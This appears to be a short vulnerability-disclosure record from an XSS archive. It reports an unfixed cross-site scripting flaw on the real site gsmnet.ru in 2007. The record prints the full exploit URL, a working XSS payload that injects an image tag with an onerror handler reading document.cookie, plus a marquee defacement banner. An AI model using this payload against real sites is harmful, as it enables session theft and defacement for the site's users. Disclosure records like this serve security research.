Unfixed XSS vulnerability at gsmnet.ru

ID XSSED:15737
Type xssed
Reporter kusomiso.com
Modified 2007-08-09T00:00:00


Security researcher kusomiso.com, has submitted on 06/09/2007 a cross-site-scripting (XSS) vulnerability affecting gsmnet.ru, which at the time of submission ranked 13191 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 08/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://gsmnet.ru/photo/thumbnails.php?album=%22%3E%3CIMG%20src=no_such_icon%20onerror=alert(document.cookie);%3E%3Cmarquee%3E%3Ch1%3EBy%20Kusomiso.com%3C/h1%3E%3C/marquee%3E&cat=-68&lang=japanese